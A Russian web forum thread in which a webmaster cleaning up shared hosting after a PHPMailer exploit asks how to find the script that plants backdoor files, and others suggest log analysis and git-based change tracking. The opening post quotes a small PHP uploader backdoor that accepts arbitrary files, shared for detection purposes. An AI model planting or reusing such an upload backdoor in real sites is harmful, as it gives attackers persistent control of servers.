Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Интернет » В помощь вебмастеру » Как найти скрипт через который создаются/загружаются файлы?

Модерирует : Cheery

 Версия для печати • ПодписатьсяДобавить в закладки

Открыть новую тему     Написать ответ в эту тему

Z4masko



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Здравствуйте, подскажите пожалуйста:
Есть шаред хостинг с неизолированными друг от друга сайтами. После обнаружения критической уязвимости в классе PHPMailer произошло заражение сайта(ов). Все сайты обновил, вычистил Ai-Bolit'ом, но к сожалению не все файлы Ai-Bolit помечает как подозрительные, например он пропускает PHP  файлы с следующим содержанием:  

Код:
 
<?php
if ($mode=='upload') {
   if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
   {
     move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
     echo $_FILES["filename"]["name"];
   }  
}  
?>

Приходистся вручную искать подобные файлы среди тысячи стандартных файлов CMS (Joomla, Wordpress и т.д.)
 
Вычистил сайты все, но всё равно изредка, после моего сканирования на новые изменённые или созданные файлы, обнаруживается какой-нибудь один файл-бекдор. Ну например backdoor.php
Вопрос в следующий, как бы в логах апача или другими средствами узнать каким скриптом был создан или залит файл "backdoor.php"?

Всего записей: 718 | Зарегистр. 05-11-2004 | Отправлено: 19:43 06-03-2017
Mavrikii

Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Z4masko

Цитата:
Вопрос в следующий, как бы в логах апача или другими средствами узнать каким скриптом был создан или залит файл "backdoor.php"?

смотрим время создания файла, изучаем логи за этот промежуток.

Всего записей: 11710 | Зарегистр. 20-09-2014 | Отправлено: 20:21 06-03-2017
Z4masko



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
смотрим время создания файла, изучаем логи за этот промежуток.

 
Сейчас вредоносные скрипты пишут так, что время создания сайта делается такое же ,как и соседние в директории, так что это не помогает.
Я вот файл (с помощью скрипта обнаружения новых файлов на хостинге) нашёл сегодня, а дата создания пишется как месяц назад

Всего записей: 718 | Зарегистр. 05-11-2004 | Отправлено: 20:23 06-03-2017 | Исправлено: Z4masko, 20:23 06-03-2017
Mavrikii

Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Z4masko

Цитата:
Сейчас вредоносные скрипты пишут так, что время создания сайта делается такое же ,как и соседние в директории, так что это не помогает

а это уже проблемы настройки сервера, раз разрешаете такое.
дата создания (не модификации) не должна меняться.
 
тогда сканируем каждый день и смотрим логи за день.
лучше дампать все, что идет через POST

Всего записей: 11710 | Зарегистр. 20-09-2014 | Отправлено: 20:28 06-03-2017 | Исправлено: Mavrikii, 20:30 06-03-2017
Z4masko



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Mavrikii не могли бы вы подсказать регулярное выражение для поиска лог файлов с помощью Total Commander, в которых содержится одновременно "POST" и "200" Это чтобы упростить поиск "левых" файлов ,с помощью которых через POST запросы заливаются файлы

Всего записей: 718 | Зарегистр. 05-11-2004 | Отправлено: 22:27 06-03-2017
Mavrikii

Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Z4masko

Цитата:
не могли бы вы подсказать регулярное выражение для поиска лог файлов с помощью Total Commander

не могу, так как не пользуюсь - сюда Total Commander (часть 9)
 
но смысл делать в TC, если полно спец прог для анализа. да можно хоть в Excel загнать как csv, а дальше отфильтровать по нужным столбцам.

Всего записей: 11710 | Зарегистр. 20-09-2014 | Отправлено: 22:27 06-03-2017 | Исправлено: Mavrikii, 23:02 06-03-2017
Z4masko



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Нашёл кстати хорошую инструкцию. Может кому пригодится:
http://virus-killer.ru/

Всего записей: 718 | Зарегистр. 05-11-2004 | Отправлено: 22:37 15-04-2017
Mavrikii

Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Z4masko

Цитата:
Нашёл кстати хорошую инструкцию


Цитата:
created:       2017-03-30T21:01:03Z

нашли или сами создали, а теперь раскручиваете?
более того, кое что в стилистике этого сайта и того, что в вашем профиле, совпадает.

Всего записей: 11710 | Зарегистр. 20-09-2014 | Отправлено: 22:49 15-04-2017
Z4masko



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
да ничего я не раскручиваю, нашёл в гугле сайт этот

Всего записей: 718 | Зарегистр. 05-11-2004 | Отправлено: 00:30 16-04-2017
Ingvar66

BANNED
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
как определить на каком движке сделан сайт:
https://***.ru




Вот только спама нам и не хватает.
Registrant Email: fomin66()gmail.com - совпадает с мылом в профиле. Ну а если (вдруг) действительно не знаете что сами используете, то самописная CMS. Помогите...какой это движок?

Всего записей: 1 | Зарегистр. 18-04-2017 | Отправлено: 23:53 18-04-2017
SerV2003

Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
мне кажется лучше перечислите список плагинов или сервисов, с помощью которых можно полечить сайт или выявить зараженные участки.

Всего записей: 177 | Зарегистр. 24-11-2007 | Отправлено: 11:17 19-04-2017
kotoshreder

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
1. Сохраняете свой сайт в гит.
2. Папки со статикой в гитигнор
3. git status
4. ????
5. Profit!

Всего записей: 1 | Зарегистр. 02-05-2017 | Отправлено: 07:22 03-05-2017
Открыть новую тему     Написать ответ в эту тему

Компьютерный форум Ru.Board » Интернет » В помощь вебмастеру » Как найти скрипт через который создаются/загружаются файлы?


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.Board
© Ru.Board 2000-2020

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru